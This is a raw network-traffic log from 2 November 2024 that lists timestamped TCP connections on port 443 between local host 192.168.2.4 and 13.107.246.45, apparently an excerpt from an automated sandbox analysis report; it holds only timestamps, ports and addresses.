                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.701075077 CET4436372213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.704660892 CET4436372313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.705174923 CET4436372613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.707778931 CET63723443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.707798958 CET4436372313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.710972071 CET63723443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.710975885 CET4436372313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.711044073 CET63726443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.711055994 CET4436372613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.714245081 CET63726443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.714250088 CET4436372613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.728866100 CET4436372513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.732963085 CET63725443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.733028889 CET4436372513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.733297110 CET63725443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.733314991 CET4436372513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.822832108 CET4436372413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.823101044 CET4436372413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.823182106 CET63724443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.823201895 CET63724443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.823215961 CET4436372413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.823227882 CET63724443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.823234081 CET4436372413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.832045078 CET4436372213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.832161903 CET4436372213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.832245111 CET63722443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.847492933 CET4436372613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.847554922 CET4436372613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.847656965 CET63726443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.855556011 CET63726443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.855562925 CET4436372613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.855571032 CET63726443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.855575085 CET4436372613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.863131046 CET4436372513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.863311052 CET4436372513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.863379955 CET63725443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.868814945 CET63725443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.868840933 CET4436372513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.868855953 CET63725443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.868863106 CET4436372513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.869555950 CET63722443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.869555950 CET63722443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.869590044 CET4436372213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.869617939 CET4436372213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.874176979 CET63727443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.874200106 CET4436372713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.874279976 CET63727443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.875500917 CET63728443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.875521898 CET4436372813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.875647068 CET63728443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.875855923 CET63727443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.875871897 CET4436372713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.877701998 CET63729443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.877743006 CET4436372913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.877963066 CET63728443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.877974987 CET4436372813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.878010035 CET63729443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.878057957 CET63729443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.878074884 CET4436372913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.879133940 CET63730443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.879141092 CET4436373013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.879237890 CET63730443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.879342079 CET63730443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.879349947 CET4436373013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.949233055 CET4436372313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.949301958 CET4436372313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.949363947 CET63723443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.978430033 CET63723443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.978435993 CET4436372313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.018107891 CET63731443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.018140078 CET4436373113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.018213987 CET63731443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.018408060 CET63731443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.018435955 CET4436373113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.612198114 CET4436372713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.612843037 CET63727443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.612900972 CET4436372713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.613420963 CET4436372913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.613693953 CET63729443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.613733053 CET4436372913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.614170074 CET63729443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.614187002 CET4436372913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.614213943 CET63727443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.614229918 CET4436372713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.622257948 CET4436372813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.622610092 CET4436373013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.622651100 CET63728443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.622662067 CET4436372813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.622829914 CET63730443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.622838020 CET4436373013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.623195887 CET63730443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.623199940 CET4436373013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.623862028 CET63728443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.623864889 CET4436372813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.742569923 CET4436372713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.742614031 CET4436372713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.742676020 CET63727443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.742830992 CET63727443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.742831945 CET63727443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.742863894 CET4436372713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.742886066 CET4436372713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.744400024 CET4436372913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.744499922 CET4436372913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.744563103 CET63729443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.744663000 CET63729443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.744663000 CET63729443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.744694948 CET4436372913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.744718075 CET4436372913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.744772911 CET4436373113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.745919943 CET63731443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.745949984 CET4436373113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.746685028 CET63732443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.746727943 CET4436373213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.746792078 CET63732443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.747128010 CET63731443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.747138977 CET4436373113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.747385979 CET63732443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.747414112 CET4436373213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.747421980 CET63733443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.747447968 CET4436373313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.747498989 CET63733443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.747608900 CET63733443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.747617960 CET4436373313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.752343893 CET4436372813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.752578020 CET4436372813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.752636909 CET63728443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.752651930 CET63728443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.752660036 CET4436372813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.752666950 CET63728443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.752671003 CET4436372813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.754316092 CET63734443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.754336119 CET4436373413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.754414082 CET63734443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.754514933 CET63734443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.754525900 CET4436373013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.754534006 CET4436373413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.754746914 CET4436373013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.754793882 CET63730443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.754821062 CET63730443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.754823923 CET4436373013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.754832983 CET63730443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.754836082 CET4436373013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.756314039 CET63735443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.756326914 CET4436373513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.756393909 CET63735443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.756501913 CET63735443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.756509066 CET4436373513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.874337912 CET4436373113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.874492884 CET4436373113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.874552965 CET63731443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.874733925 CET63731443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.874733925 CET63731443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.874775887 CET4436373113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.874803066 CET4436373113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.884743929 CET63736443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.884795904 CET4436373613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.884866953 CET63736443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.885385036 CET63736443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:57.885401964 CET4436373613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.485548019 CET4436373213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.485970020 CET63732443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.486046076 CET4436373213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.486372948 CET63732443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.486390114 CET4436373213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.507397890 CET4436373313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.507731915 CET63733443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.507750988 CET4436373313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.508143902 CET63733443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.508147955 CET4436373313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.518342018 CET4436373513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.518582106 CET63735443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.518594027 CET4436373513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.518909931 CET63735443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.518913984 CET4436373513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.521750927 CET4436373413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.521970987 CET63734443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.521991014 CET4436373413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.522290945 CET63734443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.522301912 CET4436373413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.611375093 CET4436373613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.611804008 CET63736443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.611824036 CET4436373613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.612204075 CET63736443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.612209082 CET4436373613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.616374969 CET4436373213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.616597891 CET4436373213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.616662025 CET63732443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.616712093 CET63732443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.616712093 CET63732443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.616745949 CET4436373213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.616770029 CET4436373213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.619018078 CET63737443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.619044065 CET4436373713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.619256973 CET63737443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.619256973 CET63737443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.619281054 CET4436373713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.641413927 CET4436373313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.641670942 CET4436373313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.641726017 CET63733443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.641753912 CET63733443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.641765118 CET4436373313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.641772985 CET63733443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.641777039 CET4436373313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.643448114 CET63738443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.643472910 CET4436373813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.643537998 CET63738443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.643651009 CET63738443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.643665075 CET4436373813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.654570103 CET4436373513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.654603004 CET4436373513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.654642105 CET63735443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.654727936 CET63735443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.654732943 CET4436373513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.654751062 CET4436373413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.654762030 CET63735443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.654766083 CET4436373513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.655884981 CET4436373413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.655952930 CET63734443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.655992985 CET63734443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.655992985 CET63734443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.656011105 CET4436373413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.656030893 CET4436373413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.657196045 CET63739443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.657216072 CET4436373913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.657280922 CET63739443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.657381058 CET63739443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.657387018 CET4436373913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.657665968 CET63740443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.657686949 CET4436374013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.657737970 CET63740443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.657833099 CET63740443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.657846928 CET4436374013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.781177044 CET4436373613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.781244993 CET4436373613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.781296968 CET63736443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.781383038 CET63736443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.781394005 CET4436373613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.781402111 CET63736443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.781405926 CET4436373613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.783087969 CET63741443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.783116102 CET4436374113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.783179998 CET63741443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.783277035 CET63741443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:58.783286095 CET4436374113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.380161047 CET4436373813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.380565882 CET63738443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.380590916 CET4436373813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.380970955 CET63738443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.380975962 CET4436373813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.382774115 CET4436373713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.383069992 CET63737443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.383085012 CET4436373713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.383398056 CET63737443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.383403063 CET4436373713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.407064915 CET4436373913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.407363892 CET63739443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.407370090 CET4436373913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.407702923 CET63739443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.407706022 CET4436373913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.417901993 CET4436374013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.418171883 CET63740443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.418181896 CET4436374013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.418504953 CET63740443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.418509007 CET4436374013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.514585972 CET4436373813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.514738083 CET4436373813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.514811993 CET63738443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.514889956 CET63738443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.514889956 CET63738443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.514929056 CET4436373813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.514951944 CET4436373813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.517318964 CET63742443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.517339945 CET4436374213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.517427921 CET63742443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.517558098 CET63742443192.168.2.413.107.246.45
